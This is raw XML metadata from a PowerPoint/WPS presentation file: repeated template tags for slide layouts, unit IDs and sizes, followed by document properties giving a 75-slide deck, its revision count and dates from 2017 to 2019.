  <p:tag name="KSO_WM_SLIDE_SIZE" val="342*30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SubTitleText"/>
  <p:tag name="MH" val="20150923150227"/>
  <p:tag name="MH_LIBRARY" val="GRAPHIC"/>
  <p:tag name="KSO_WM_TEMPLATE_CATEGORY" val="custom"/>
  <p:tag name="KSO_WM_TEMPLATE_INDEX" val="160564"/>
  <p:tag name="KSO_WM_TAG_VERSION" val="1.0"/>
  <p:tag name="KSO_WM_SLIDE_ID" val="custom160564_19"/>
  <p:tag name="KSO_WM_SLIDE_INDEX" val="19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491*182"/>
  <p:tag name="KSO_WM_SLIDE_SIZE" val="342*30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50923145735"/>
  <p:tag name="MH_LIBRARY" val="GRAPHIC"/>
  <p:tag name="KSO_WM_TEMPLATE_CATEGORY" val="custom"/>
  <p:tag name="KSO_WM_TEMPLATE_INDEX" val="160564"/>
  <p:tag name="KSO_WM_TAG_VERSION" val="1.0"/>
  <p:tag name="KSO_WM_SLIDE_ID" val="custom160564_18"/>
  <p:tag name="KSO_WM_SLIDE_INDEX" val="18"/>
  <p:tag name="KSO_WM_SLIDE_ITEM_CNT" val="6"/>
  <p:tag name="KSO_WM_SLIDE_LAYOUT" val="a_l"/>
  <p:tag name="KSO_WM_SLIDE_LAYOUT_CNT" val="1_1"/>
  <p:tag name="KSO_WM_SLIDE_TYPE" val="text"/>
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val="#wm#"/>
  <p:tag name="KSO_WM_SLIDE_POSITION" val="85*179"/>
  <p:tag name="KSO_WM_SLIDE_SIZE" val="790*297"/>
  <p:tag name="KSO_WM_DIAGRAM_GROUP_CODE" val="l1-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18*i*0"/>
  <p:tag name="KSO_WM_TEMPLATE_CATEGORY" val="custom"/>
  <p:tag name="KSO_WM_TEMPLATE_INDEX" val="160564"/>
  <p:tag name="KSO_WM_UNIT_INDEX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18*i*5"/>
  <p:tag name="KSO_WM_TEMPLATE_CATEGORY" val="custom"/>
  <p:tag name="KSO_WM_TEMPLATE_INDEX" val="160564"/>
  <p:tag name="KSO_WM_UNIT_INDEX" val="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18*i*10"/>
  <p:tag name="KSO_WM_TEMPLATE_CATEGORY" val="custom"/>
  <p:tag name="KSO_WM_TEMPLATE_INDEX" val="160564"/>
  <p:tag name="KSO_WM_UNIT_INDEX" val="1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18*i*15"/>
  <p:tag name="KSO_WM_TEMPLATE_CATEGORY" val="custom"/>
  <p:tag name="KSO_WM_TEMPLATE_INDEX" val="160564"/>
  <p:tag name="KSO_WM_UNIT_INDEX" val="1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18*i*15"/>
  <p:tag name="KSO_WM_TEMPLATE_CATEGORY" val="custom"/>
  <p:tag name="KSO_WM_TEMPLATE_INDEX" val="160564"/>
  <p:tag name="KSO_WM_UNIT_INDEX" val="1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4"/>
  <p:tag name="KSO_WM_UNIT_ID" val="custom160564_18*l_i*1_4"/>
  <p:tag name="KSO_WM_UNIT_CLEAR" val="1"/>
  <p:tag name="KSO_WM_UNIT_LAYERLEVEL" val="1_1"/>
  <p:tag name="KSO_WM_DIAGRAM_GROUP_CODE" val="l1-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4_1"/>
  <p:tag name="KSO_WM_UNIT_ID" val="custom160564_18*l_h_f*1_4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4231"/>
  <p:tag name="MH_LIBRARY" val="GRAPHIC"/>
  <p:tag name="MH_ORDER" val="Rectangle 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4"/>
  <p:tag name="KSO_WM_UNIT_ID" val="custom160564_18*l_i*1_4"/>
  <p:tag name="KSO_WM_UNIT_CLEAR" val="1"/>
  <p:tag name="KSO_WM_UNIT_LAYERLEVEL" val="1_1"/>
  <p:tag name="KSO_WM_DIAGRAM_GROUP_CODE" val="l1-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4_1"/>
  <p:tag name="KSO_WM_UNIT_ID" val="custom160564_18*l_h_f*1_4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3"/>
  <p:tag name="KSO_WM_UNIT_ID" val="custom160564_18*l_i*1_3"/>
  <p:tag name="KSO_WM_UNIT_CLEAR" val="1"/>
  <p:tag name="KSO_WM_UNIT_LAYERLEVEL" val="1_1"/>
  <p:tag name="KSO_WM_DIAGRAM_GROUP_CODE" val="l1-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3_1"/>
  <p:tag name="KSO_WM_UNIT_ID" val="custom160564_18*l_h_f*1_3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2"/>
  <p:tag name="KSO_WM_UNIT_ID" val="custom160564_18*l_i*1_2"/>
  <p:tag name="KSO_WM_UNIT_CLEAR" val="1"/>
  <p:tag name="KSO_WM_UNIT_LAYERLEVEL" val="1_1"/>
  <p:tag name="KSO_WM_DIAGRAM_GROUP_CODE" val="l1-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2_1"/>
  <p:tag name="KSO_WM_UNIT_ID" val="custom160564_18*l_h_f*1_2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1"/>
  <p:tag name="KSO_WM_UNIT_ID" val="custom160564_18*l_i*1_1"/>
  <p:tag name="KSO_WM_UNIT_CLEAR" val="1"/>
  <p:tag name="KSO_WM_UNIT_LAYERLEVEL" val="1_1"/>
  <p:tag name="KSO_WM_DIAGRAM_GROUP_CODE" val="l1-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1_1"/>
  <p:tag name="KSO_WM_UNIT_ID" val="custom160564_18*l_h_f*1_1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50923145735"/>
  <p:tag name="MH_LIBRARY" val="GRAPHIC"/>
  <p:tag name="KSO_WM_TEMPLATE_CATEGORY" val="custom"/>
  <p:tag name="KSO_WM_TEMPLATE_INDEX" val="160564"/>
  <p:tag name="KSO_WM_TAG_VERSION" val="1.0"/>
  <p:tag name="KSO_WM_SLIDE_ID" val="custom160564_18"/>
  <p:tag name="KSO_WM_SLIDE_INDEX" val="18"/>
  <p:tag name="KSO_WM_SLIDE_ITEM_CNT" val="6"/>
  <p:tag name="KSO_WM_SLIDE_LAYOUT" val="a_l"/>
  <p:tag name="KSO_WM_SLIDE_LAYOUT_CNT" val="1_1"/>
  <p:tag name="KSO_WM_SLIDE_TYPE" val="text"/>
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val="#wm#"/>
  <p:tag name="KSO_WM_SLIDE_POSITION" val="85*179"/>
  <p:tag name="KSO_WM_SLIDE_SIZE" val="790*297"/>
  <p:tag name="KSO_WM_DIAGRAM_GROUP_CODE" val="l1-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18*i*0"/>
  <p:tag name="KSO_WM_TEMPLATE_CATEGORY" val="custom"/>
  <p:tag name="KSO_WM_TEMPLATE_INDEX" val="160564"/>
  <p:tag name="KSO_WM_UNIT_INDEX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4231"/>
  <p:tag name="MH_LIBRARY" val="GRAPHIC"/>
  <p:tag name="MH_ORDER" val="矩形 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18*i*5"/>
  <p:tag name="KSO_WM_TEMPLATE_CATEGORY" val="custom"/>
  <p:tag name="KSO_WM_TEMPLATE_INDEX" val="160564"/>
  <p:tag name="KSO_WM_UNIT_INDEX" val="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18*i*10"/>
  <p:tag name="KSO_WM_TEMPLATE_CATEGORY" val="custom"/>
  <p:tag name="KSO_WM_TEMPLATE_INDEX" val="160564"/>
  <p:tag name="KSO_WM_UNIT_INDEX" val="1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3"/>
  <p:tag name="KSO_WM_UNIT_ID" val="custom160564_18*l_i*1_3"/>
  <p:tag name="KSO_WM_UNIT_CLEAR" val="1"/>
  <p:tag name="KSO_WM_UNIT_LAYERLEVEL" val="1_1"/>
  <p:tag name="KSO_WM_DIAGRAM_GROUP_CODE" val="l1-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3_1"/>
  <p:tag name="KSO_WM_UNIT_ID" val="custom160564_18*l_h_f*1_3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2"/>
  <p:tag name="KSO_WM_UNIT_ID" val="custom160564_18*l_i*1_2"/>
  <p:tag name="KSO_WM_UNIT_CLEAR" val="1"/>
  <p:tag name="KSO_WM_UNIT_LAYERLEVEL" val="1_1"/>
  <p:tag name="KSO_WM_DIAGRAM_GROUP_CODE" val="l1-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2_1"/>
  <p:tag name="KSO_WM_UNIT_ID" val="custom160564_18*l_h_f*1_2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1"/>
  <p:tag name="KSO_WM_UNIT_ID" val="custom160564_18*l_i*1_1"/>
  <p:tag name="KSO_WM_UNIT_CLEAR" val="1"/>
  <p:tag name="KSO_WM_UNIT_LAYERLEVEL" val="1_1"/>
  <p:tag name="KSO_WM_DIAGRAM_GROUP_CODE" val="l1-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1_1"/>
  <p:tag name="KSO_WM_UNIT_ID" val="custom160564_18*l_h_f*1_1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1857"/>
  <p:tag name="MH_LIBRARY" val="GRAPHIC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1857"/>
  <p:tag name="MH_LIBRARY" val="GRAPHIC"/>
  <p:tag name="MH_ORDER" val="Freeform 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4231"/>
  <p:tag name="MH_LIBRARY" val="GRAPHIC"/>
  <p:tag name="MH_ORDER" val="Rectangle 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1857"/>
  <p:tag name="MH_LIBRARY" val="GRAPHIC"/>
  <p:tag name="MH_ORDER" val="Rectangle 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1857"/>
  <p:tag name="MH_LIBRARY" val="GRAPHIC"/>
  <p:tag name="MH_ORDER" val="矩形 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1857"/>
  <p:tag name="MH_LIBRARY" val="GRAPHIC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1857"/>
  <p:tag name="MH_LIBRARY" val="GRAPHIC"/>
  <p:tag name="MH_ORDER" val="Freeform 1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1857"/>
  <p:tag name="MH_LIBRARY" val="GRAPHIC"/>
  <p:tag name="MH_ORDER" val="Rectangle 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1857"/>
  <p:tag name="MH_LIBRARY" val="GRAPHIC"/>
  <p:tag name="MH_ORDER" val="矩形 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SubTitleText"/>
  <p:tag name="MH" val="20150923150227"/>
  <p:tag name="MH_LIBRARY" val="GRAPHIC"/>
  <p:tag name="KSO_WM_TEMPLATE_CATEGORY" val="custom"/>
  <p:tag name="KSO_WM_TEMPLATE_INDEX" val="160564"/>
  <p:tag name="KSO_WM_TAG_VERSION" val="1.0"/>
  <p:tag name="KSO_WM_SLIDE_ID" val="custom160564_19"/>
  <p:tag name="KSO_WM_SLIDE_INDEX" val="19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491*182"/>
  <p:tag name="KSO_WM_SLIDE_SIZE" val="342*30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SubTitleText"/>
  <p:tag name="MH" val="20150923150227"/>
  <p:tag name="MH_LIBRARY" val="GRAPHIC"/>
  <p:tag name="KSO_WM_TEMPLATE_CATEGORY" val="custom"/>
  <p:tag name="KSO_WM_TEMPLATE_INDEX" val="160564"/>
  <p:tag name="KSO_WM_TAG_VERSION" val="1.0"/>
  <p:tag name="KSO_WM_SLIDE_ID" val="custom160564_19"/>
  <p:tag name="KSO_WM_SLIDE_INDEX" val="19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491*182"/>
  <p:tag name="KSO_WM_SLIDE_SIZE" val="342*30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SubTitleText"/>
  <p:tag name="MH" val="20150923150227"/>
  <p:tag name="MH_LIBRARY" val="GRAPHIC"/>
  <p:tag name="KSO_WM_TEMPLATE_CATEGORY" val="custom"/>
  <p:tag name="KSO_WM_TEMPLATE_INDEX" val="160564"/>
  <p:tag name="KSO_WM_TAG_VERSION" val="1.0"/>
  <p:tag name="KSO_WM_SLIDE_ID" val="custom160564_19"/>
  <p:tag name="KSO_WM_SLIDE_INDEX" val="19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491*182"/>
  <p:tag name="KSO_WM_SLIDE_SIZE" val="342*30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50923145735"/>
  <p:tag name="MH_LIBRARY" val="GRAPHIC"/>
  <p:tag name="KSO_WM_TEMPLATE_CATEGORY" val="custom"/>
  <p:tag name="KSO_WM_TEMPLATE_INDEX" val="160564"/>
  <p:tag name="KSO_WM_TAG_VERSION" val="1.0"/>
  <p:tag name="KSO_WM_SLIDE_ID" val="custom160564_16"/>
  <p:tag name="KSO_WM_SLIDE_INDEX" val="16"/>
  <p:tag name="KSO_WM_SLIDE_ITEM_CNT" val="4"/>
  <p:tag name="KSO_WM_SLIDE_LAYOUT" val="a_l"/>
  <p:tag name="KSO_WM_SLIDE_LAYOUT_CNT" val="1_1"/>
  <p:tag name="KSO_WM_SLIDE_TYPE" val="text"/>
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val="#wm#"/>
  <p:tag name="KSO_WM_SLIDE_POSITION" val="85*207"/>
  <p:tag name="KSO_WM_SLIDE_SIZE" val="790*216"/>
  <p:tag name="KSO_WM_DIAGRAM_GROUP_CODE" val="l1-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14231"/>
  <p:tag name="MH_LIBRARY" val="GRAPHIC"/>
  <p:tag name="MH_ORDER" val="Rectangle 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16*i*0"/>
  <p:tag name="KSO_WM_TEMPLATE_CATEGORY" val="custom"/>
  <p:tag name="KSO_WM_TEMPLATE_INDEX" val="160564"/>
  <p:tag name="KSO_WM_UNIT_INDEX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16*i*5"/>
  <p:tag name="KSO_WM_TEMPLATE_CATEGORY" val="custom"/>
  <p:tag name="KSO_WM_TEMPLATE_INDEX" val="160564"/>
  <p:tag name="KSO_WM_UNIT_INDEX" val="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2"/>
  <p:tag name="KSO_WM_UNIT_ID" val="custom160564_16*l_i*1_2"/>
  <p:tag name="KSO_WM_UNIT_CLEAR" val="1"/>
  <p:tag name="KSO_WM_UNIT_LAYERLEVEL" val="1_1"/>
  <p:tag name="KSO_WM_DIAGRAM_GROUP_CODE" val="l1-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2_1"/>
  <p:tag name="KSO_WM_UNIT_ID" val="custom160564_16*l_h_f*1_2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1"/>
  <p:tag name="KSO_WM_UNIT_ID" val="custom160564_16*l_i*1_1"/>
  <p:tag name="KSO_WM_UNIT_CLEAR" val="1"/>
  <p:tag name="KSO_WM_UNIT_LAYERLEVEL" val="1_1"/>
  <p:tag name="KSO_WM_DIAGRAM_GROUP_CODE" val="l1-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1_1"/>
  <p:tag name="KSO_WM_UNIT_ID" val="custom160564_16*l_h_f*1_1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SubTitleText"/>
  <p:tag name="MH" val="20150923150227"/>
  <p:tag name="MH_LIBRARY" val="GRAPHIC"/>
  <p:tag name="KSO_WM_TEMPLATE_CATEGORY" val="custom"/>
  <p:tag name="KSO_WM_TEMPLATE_INDEX" val="160564"/>
  <p:tag name="KSO_WM_TAG_VERSION" val="1.0"/>
  <p:tag name="KSO_WM_SLIDE_ID" val="custom160564_19"/>
  <p:tag name="KSO_WM_SLIDE_INDEX" val="19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491*182"/>
  <p:tag name="KSO_WM_SLIDE_SIZE" val="342*30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SubTitleText"/>
  <p:tag name="MH" val="20150923150227"/>
  <p:tag name="MH_LIBRARY" val="GRAPHIC"/>
  <p:tag name="KSO_WM_TEMPLATE_CATEGORY" val="custom"/>
  <p:tag name="KSO_WM_TEMPLATE_INDEX" val="160564"/>
  <p:tag name="KSO_WM_TAG_VERSION" val="1.0"/>
  <p:tag name="KSO_WM_SLIDE_ID" val="custom160564_19"/>
  <p:tag name="KSO_WM_SLIDE_INDEX" val="19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491*182"/>
  <p:tag name="KSO_WM_SLIDE_SIZE" val="342*30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50923145735"/>
  <p:tag name="MH_LIBRARY" val="GRAPHIC"/>
  <p:tag name="KSO_WM_TEMPLATE_CATEGORY" val="custom"/>
  <p:tag name="KSO_WM_TEMPLATE_INDEX" val="160564"/>
  <p:tag name="KSO_WM_TAG_VERSION" val="1.0"/>
  <p:tag name="KSO_WM_SLIDE_ID" val="custom160564_16"/>
  <p:tag name="KSO_WM_SLIDE_INDEX" val="16"/>
  <p:tag name="KSO_WM_SLIDE_ITEM_CNT" val="4"/>
  <p:tag name="KSO_WM_SLIDE_LAYOUT" val="a_l"/>
  <p:tag name="KSO_WM_SLIDE_LAYOUT_CNT" val="1_1"/>
  <p:tag name="KSO_WM_SLIDE_TYPE" val="text"/>
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val="#wm#"/>
  <p:tag name="KSO_WM_SLIDE_POSITION" val="85*207"/>
  <p:tag name="KSO_WM_SLIDE_SIZE" val="790*216"/>
  <p:tag name="KSO_WM_DIAGRAM_GROUP_CODE" val="l1-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16*i*0"/>
  <p:tag name="KSO_WM_TEMPLATE_CATEGORY" val="custom"/>
  <p:tag name="KSO_WM_TEMPLATE_INDEX" val="160564"/>
  <p:tag name="KSO_WM_UNIT_INDEX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16*i*5"/>
  <p:tag name="KSO_WM_TEMPLATE_CATEGORY" val="custom"/>
  <p:tag name="KSO_WM_TEMPLATE_INDEX" val="160564"/>
  <p:tag name="KSO_WM_UNIT_INDEX" val="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16*i*10"/>
  <p:tag name="KSO_WM_TEMPLATE_CATEGORY" val="custom"/>
  <p:tag name="KSO_WM_TEMPLATE_INDEX" val="160564"/>
  <p:tag name="KSO_WM_UNIT_INDEX" val="1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16*i*15"/>
  <p:tag name="KSO_WM_TEMPLATE_CATEGORY" val="custom"/>
  <p:tag name="KSO_WM_TEMPLATE_INDEX" val="160564"/>
  <p:tag name="KSO_WM_UNIT_INDEX" val="1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4"/>
  <p:tag name="KSO_WM_UNIT_ID" val="custom160564_16*l_i*1_4"/>
  <p:tag name="KSO_WM_UNIT_CLEAR" val="1"/>
  <p:tag name="KSO_WM_UNIT_LAYERLEVEL" val="1_1"/>
  <p:tag name="KSO_WM_DIAGRAM_GROUP_CODE" val="l1-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4_1"/>
  <p:tag name="KSO_WM_UNIT_ID" val="custom160564_16*l_h_f*1_4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3"/>
  <p:tag name="KSO_WM_UNIT_ID" val="custom160564_16*l_i*1_3"/>
  <p:tag name="KSO_WM_UNIT_CLEAR" val="1"/>
  <p:tag name="KSO_WM_UNIT_LAYERLEVEL" val="1_1"/>
  <p:tag name="KSO_WM_DIAGRAM_GROUP_CODE" val="l1-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3_1"/>
  <p:tag name="KSO_WM_UNIT_ID" val="custom160564_16*l_h_f*1_3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2"/>
  <p:tag name="KSO_WM_UNIT_ID" val="custom160564_16*l_i*1_2"/>
  <p:tag name="KSO_WM_UNIT_CLEAR" val="1"/>
  <p:tag name="KSO_WM_UNIT_LAYERLEVEL" val="1_1"/>
  <p:tag name="KSO_WM_DIAGRAM_GROUP_CODE" val="l1-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2_1"/>
  <p:tag name="KSO_WM_UNIT_ID" val="custom160564_16*l_h_f*1_2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1"/>
  <p:tag name="KSO_WM_UNIT_ID" val="custom160564_16*l_i*1_1"/>
  <p:tag name="KSO_WM_UNIT_CLEAR" val="1"/>
  <p:tag name="KSO_WM_UNIT_LAYERLEVEL" val="1_1"/>
  <p:tag name="KSO_WM_DIAGRAM_GROUP_CODE" val="l1-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1857"/>
  <p:tag name="MH_LIBRARY" val="GRAPHIC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1_1"/>
  <p:tag name="KSO_WM_UNIT_ID" val="custom160564_16*l_h_f*1_1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1857"/>
  <p:tag name="MH_LIBRARY" val="GRAPHIC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1857"/>
  <p:tag name="MH_LIBRARY" val="GRAPHIC"/>
  <p:tag name="MH_ORDER" val="Freeform 1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1857"/>
  <p:tag name="MH_LIBRARY" val="GRAPHIC"/>
  <p:tag name="MH_ORDER" val="Rectangle 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1857"/>
  <p:tag name="MH_LIBRARY" val="GRAPHIC"/>
  <p:tag name="MH_ORDER" val="矩形 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SubTitleText"/>
  <p:tag name="MH" val="20150923150227"/>
  <p:tag name="MH_LIBRARY" val="GRAPHIC"/>
  <p:tag name="KSO_WM_TEMPLATE_CATEGORY" val="custom"/>
  <p:tag name="KSO_WM_TEMPLATE_INDEX" val="160564"/>
  <p:tag name="KSO_WM_TAG_VERSION" val="1.0"/>
  <p:tag name="KSO_WM_SLIDE_ID" val="custom160564_19"/>
  <p:tag name="KSO_WM_SLIDE_INDEX" val="19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491*182"/>
  <p:tag name="KSO_WM_SLIDE_SIZE" val="342*30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SubTitleText"/>
  <p:tag name="MH" val="20150923150227"/>
  <p:tag name="MH_LIBRARY" val="GRAPHIC"/>
  <p:tag name="KSO_WM_TEMPLATE_CATEGORY" val="custom"/>
  <p:tag name="KSO_WM_TEMPLATE_INDEX" val="160564"/>
  <p:tag name="KSO_WM_TAG_VERSION" val="1.0"/>
  <p:tag name="KSO_WM_SLIDE_ID" val="custom160564_19"/>
  <p:tag name="KSO_WM_SLIDE_INDEX" val="19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491*182"/>
  <p:tag name="KSO_WM_SLIDE_SIZE" val="342*30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SubTitleText"/>
  <p:tag name="MH" val="20150923150227"/>
  <p:tag name="MH_LIBRARY" val="GRAPHIC"/>
  <p:tag name="KSO_WM_TEMPLATE_CATEGORY" val="custom"/>
  <p:tag name="KSO_WM_TEMPLATE_INDEX" val="160564"/>
  <p:tag name="KSO_WM_TAG_VERSION" val="1.0"/>
  <p:tag name="KSO_WM_SLIDE_ID" val="custom160564_19"/>
  <p:tag name="KSO_WM_SLIDE_INDEX" val="19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491*182"/>
  <p:tag name="KSO_WM_SLIDE_SIZE" val="342*30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SubTitleText"/>
  <p:tag name="MH" val="20150923150227"/>
  <p:tag name="MH_LIBRARY" val="GRAPHIC"/>
  <p:tag name="KSO_WM_TEMPLATE_CATEGORY" val="custom"/>
  <p:tag name="KSO_WM_TEMPLATE_INDEX" val="160564"/>
  <p:tag name="KSO_WM_TAG_VERSION" val="1.0"/>
  <p:tag name="KSO_WM_SLIDE_ID" val="custom160564_19"/>
  <p:tag name="KSO_WM_SLIDE_INDEX" val="19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491*182"/>
  <p:tag name="KSO_WM_SLIDE_SIZE" val="342*30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SubTitleText"/>
  <p:tag name="MH" val="20150923150227"/>
  <p:tag name="MH_LIBRARY" val="GRAPHIC"/>
  <p:tag name="KSO_WM_TEMPLATE_CATEGORY" val="custom"/>
  <p:tag name="KSO_WM_TEMPLATE_INDEX" val="160564"/>
  <p:tag name="KSO_WM_TAG_VERSION" val="1.0"/>
  <p:tag name="KSO_WM_SLIDE_ID" val="custom160564_19"/>
  <p:tag name="KSO_WM_SLIDE_INDEX" val="19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491*182"/>
  <p:tag name="KSO_WM_SLIDE_SIZE" val="342*30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1857"/>
  <p:tag name="MH_LIBRARY" val="GRAPHIC"/>
  <p:tag name="MH_ORDER" val="Freeform 1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SubTitleText"/>
  <p:tag name="MH" val="20150923150227"/>
  <p:tag name="MH_LIBRARY" val="GRAPHIC"/>
  <p:tag name="KSO_WM_TEMPLATE_CATEGORY" val="custom"/>
  <p:tag name="KSO_WM_TEMPLATE_INDEX" val="160564"/>
  <p:tag name="KSO_WM_TAG_VERSION" val="1.0"/>
  <p:tag name="KSO_WM_SLIDE_ID" val="custom160564_19"/>
  <p:tag name="KSO_WM_SLIDE_INDEX" val="19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491*182"/>
  <p:tag name="KSO_WM_SLIDE_SIZE" val="342*30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50923145735"/>
  <p:tag name="MH_LIBRARY" val="GRAPHIC"/>
  <p:tag name="KSO_WM_TEMPLATE_CATEGORY" val="custom"/>
  <p:tag name="KSO_WM_TEMPLATE_INDEX" val="160564"/>
  <p:tag name="KSO_WM_TAG_VERSION" val="1.0"/>
  <p:tag name="KSO_WM_SLIDE_ID" val="custom160564_18"/>
  <p:tag name="KSO_WM_SLIDE_INDEX" val="18"/>
  <p:tag name="KSO_WM_SLIDE_ITEM_CNT" val="6"/>
  <p:tag name="KSO_WM_SLIDE_LAYOUT" val="a_l"/>
  <p:tag name="KSO_WM_SLIDE_LAYOUT_CNT" val="1_1"/>
  <p:tag name="KSO_WM_SLIDE_TYPE" val="text"/>
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val="#wm#"/>
  <p:tag name="KSO_WM_SLIDE_POSITION" val="85*179"/>
  <p:tag name="KSO_WM_SLIDE_SIZE" val="790*297"/>
  <p:tag name="KSO_WM_DIAGRAM_GROUP_CODE" val="l1-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18*i*0"/>
  <p:tag name="KSO_WM_TEMPLATE_CATEGORY" val="custom"/>
  <p:tag name="KSO_WM_TEMPLATE_INDEX" val="160564"/>
  <p:tag name="KSO_WM_UNIT_INDEX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1"/>
  <p:tag name="KSO_WM_UNIT_ID" val="custom160564_18*l_i*1_1"/>
  <p:tag name="KSO_WM_UNIT_CLEAR" val="1"/>
  <p:tag name="KSO_WM_UNIT_LAYERLEVEL" val="1_1"/>
  <p:tag name="KSO_WM_DIAGRAM_GROUP_CODE" val="l1-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1_1"/>
  <p:tag name="KSO_WM_UNIT_ID" val="custom160564_18*l_h_f*1_1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50923145735"/>
  <p:tag name="MH_LIBRARY" val="GRAPHIC"/>
  <p:tag name="KSO_WM_TEMPLATE_CATEGORY" val="custom"/>
  <p:tag name="KSO_WM_TEMPLATE_INDEX" val="160564"/>
  <p:tag name="KSO_WM_TAG_VERSION" val="1.0"/>
  <p:tag name="KSO_WM_SLIDE_ID" val="custom160564_18"/>
  <p:tag name="KSO_WM_SLIDE_INDEX" val="18"/>
  <p:tag name="KSO_WM_SLIDE_ITEM_CNT" val="6"/>
  <p:tag name="KSO_WM_SLIDE_LAYOUT" val="a_l"/>
  <p:tag name="KSO_WM_SLIDE_LAYOUT_CNT" val="1_1"/>
  <p:tag name="KSO_WM_SLIDE_TYPE" val="text"/>
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val="#wm#"/>
  <p:tag name="KSO_WM_SLIDE_POSITION" val="85*179"/>
  <p:tag name="KSO_WM_SLIDE_SIZE" val="790*297"/>
  <p:tag name="KSO_WM_DIAGRAM_GROUP_CODE" val="l1-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18*i*10"/>
  <p:tag name="KSO_WM_TEMPLATE_CATEGORY" val="custom"/>
  <p:tag name="KSO_WM_TEMPLATE_INDEX" val="160564"/>
  <p:tag name="KSO_WM_UNIT_INDEX" val="1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Other"/>
  <p:tag name="MH_ORDER" val="1"/>
  <p:tag name="KSO_WM_UNIT_TYPE" val="l_i"/>
  <p:tag name="KSO_WM_UNIT_INDEX" val="1_3"/>
  <p:tag name="KSO_WM_UNIT_ID" val="custom160564_18*l_i*1_3"/>
  <p:tag name="KSO_WM_UNIT_CLEAR" val="1"/>
  <p:tag name="KSO_WM_UNIT_LAYERLEVEL" val="1_1"/>
  <p:tag name="KSO_WM_DIAGRAM_GROUP_CODE" val="l1-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735"/>
  <p:tag name="MH_LIBRARY" val="GRAPHIC"/>
  <p:tag name="MH_TYPE" val="SubTitle"/>
  <p:tag name="MH_ORDER" val="1"/>
  <p:tag name="KSO_WM_UNIT_TYPE" val="l_h_f"/>
  <p:tag name="KSO_WM_UNIT_INDEX" val="1_3_1"/>
  <p:tag name="KSO_WM_UNIT_ID" val="custom160564_18*l_h_f*1_3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26"/>
  <p:tag name="KSO_WM_DIAGRAM_GROUP_CODE" val="l1-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50923145735"/>
  <p:tag name="MH_LIBRARY" val="GRAPHIC"/>
  <p:tag name="KSO_WM_TEMPLATE_CATEGORY" val="custom"/>
  <p:tag name="KSO_WM_TEMPLATE_INDEX" val="160564"/>
  <p:tag name="KSO_WM_TAG_VERSION" val="1.0"/>
  <p:tag name="KSO_WM_SLIDE_ID" val="custom160564_18"/>
  <p:tag name="KSO_WM_SLIDE_INDEX" val="18"/>
  <p:tag name="KSO_WM_SLIDE_ITEM_CNT" val="6"/>
  <p:tag name="KSO_WM_SLIDE_LAYOUT" val="a_l"/>
  <p:tag name="KSO_WM_SLIDE_LAYOUT_CNT" val="1_1"/>
  <p:tag name="KSO_WM_SLIDE_TYPE" val="text"/>
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val="#wm#"/>
  <p:tag name="KSO_WM_SLIDE_POSITION" val="85*179"/>
  <p:tag name="KSO_WM_SLIDE_SIZE" val="790*297"/>
  <p:tag name="KSO_WM_DIAGRAM_GROUP_CODE" val="l1-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9145</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>自定义</PresentationFormat>
  <Paragraphs>1195</Paragraphs>
  <Slides>75</Slides>
  <Notes>42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76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Windows 用户</cp:lastModifiedBy>
  <cp:revision>1898</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2017-08-23T13:00:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-01-23T07:32:44Z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  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="KSORubyTemplateID">
    <vt:lpwstr>2</vt:lpwstr>
  </property>
</Properties>
</file>